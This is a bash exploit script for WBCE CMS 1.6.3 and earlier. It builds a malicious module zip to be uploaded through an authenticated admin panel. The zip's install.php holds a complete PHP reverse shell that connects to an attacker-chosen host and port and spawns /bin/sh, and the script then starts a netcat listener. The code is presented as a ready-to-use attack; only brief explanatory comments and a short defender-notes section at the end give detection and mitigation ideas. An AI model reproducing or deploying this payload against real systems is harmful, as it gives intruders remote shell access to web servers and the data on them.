# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash
# Make a zip file exploit
# Start netcat listener

# Overview: this script only builds a module archive (shellModule.zip) and
# then waits on a local netcat listener. It never contacts the CMS itself;
# per the usage text below, an already-authenticated admin has to upload and
# install the archive by hand.
#
# Root cause as this page describes it: installing a module "immediately
# runs" code shipped inside the uploaded zip (here install.php). In other
# words, the permission to install modules is equivalent to code execution
# on the web host -- presumably with the web server account's privileges
# (not shown on this page; confirm against the deployment).

# Exactly two positional arguments are required; otherwise print the
# description/usage text and stop.
if [[ $# -ne 2 ]]; then
    echo "[*] Description:"
    echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
    echo "[*] It will create an infected module .zip file and start a netcat listener."
    echo "[*] Once the zip is created, you will have to login to the admin page"
    echo "[*] to upload and install the module, which will immediately run the shell"
    echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
    echo "[!] Usage:"
    echo "[*] $0 <lhost> <lport>"
    exit 1
fi

# The listener step at the end depends on nc being on PATH.
if [ -z "$(which nc)" ]; then
    echo "[!] Netcat is not installed." 
    exit 1
fi

# $1/$2 are copied as-is; they are later expanded into the generated PHP.
ip=$1
port=$2

# Clear artifacts of a previous run in the current directory, then create
# the staging directory for the module files.
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule
echo [*] Crafting Payload

# info.php: module metadata (directory, name, function, version, ...).
# The EOF delimiter is unquoted, so the shell would expand variables inside
# the heredoc; every PHP variable is therefore written as \$name to reach the
# file as a literal $name.
cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category modules
 * @package Reverse Shell
 * @author Swammers8
 * @link https://swammers8.github.io/
 * @license http://www.gnu.org/licenses/gpl.html
 * @platform example.com
 * @requirements PHP 5.6 and higher
 * @version 1.3.3.7
 * @lastmodified May 22 2025
 *
 *
 */

\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';
\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF

# install.php: the pentestmonkey PHP reverse shell referenced in the usage
# text. Only $ip and $port (unescaped) are filled in by the shell; the rest
# is emitted verbatim. Visible behaviour of the generated file: optional
# pcntl_fork()/posix_setsid() daemonisation, an outbound fsockopen() to
# ip:port, proc_open() of '/bin/sh -i', and a stream_select() loop relaying
# bytes between the socket and the child's stdin/stdout/stderr.
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
    \$pid = pcntl_fork();

    if (\$pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if (\$pid) {
        exit(0); // Parent exits
    }

    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    \$daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. 
This is quite common and not fatal.");
}

chdir("/");

umask(0);

\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
    printit("\$errstr (\$errno)");
    exit(1);
}

\$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
    if (feof(\$sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    if (feof(\$pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    \$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

    if (in_array(\$sock, \$read_a)) {
        if (\$debug) printit("SOCK READ");
        \$input = fread(\$sock, \$chunk_size);
        if (\$debug) printit("SOCK: \$input");
        fwrite(\$pipes[0], \$input);
    }

    if (in_array(\$pipes[1], \$read_a)) {
        if (\$debug) printit("STDOUT READ");
        \$input = fread(\$pipes[1], \$chunk_size);
        if (\$debug) printit("STDOUT: \$input");
        fwrite(\$sock, \$input);
    }

    if (in_array(\$pipes[2], \$read_a)) {
        if (\$debug) printit("STDERR READ");
        \$input = fread(\$pipes[2], \$chunk_size);
        if (\$debug) printit("STDERR: \$input");
        fwrite(\$sock, \$input);
    }
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
    if (!\$daemon) {
        print "\$string\n";
    }
}

?>
EOF

# Package the staging directory and delete the unpacked copy.
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule

# Manual step: the upload/install happens in the admin panel, outside this
# script. nc then blocks until the connection ends or is interrupted.
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener
nc -lvnp $port 
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"

# Defender notes (derived from what the generated files do):
#  - The labels in info.php ('Reverse Shell', 'modshell', version 1.3.3.7,
#    author) are free-form strings and make weak indicators on their own.
#  - More durable signals: an admin-panel module upload followed by the web
#    server / PHP process spawning /bin/sh (the child runs 'uname -a; w; id'
#    first) and holding an outbound TCP connection to a non-service port.
#  - The payload depends on fsockopen() and proc_open(); pcntl_fork() is
#    optional. Where the site does not need them, PHP's disable_functions
#    setting and egress filtering from the web host both break this chain.
#  - Because module installation is code execution, limit and audit the
#    accounts allowed to install modules and review installed modules after
#    any suspected admin-credential compromise. No fixed version is named on
#    this page; check the vendor's advisories for releases after 1.6.3.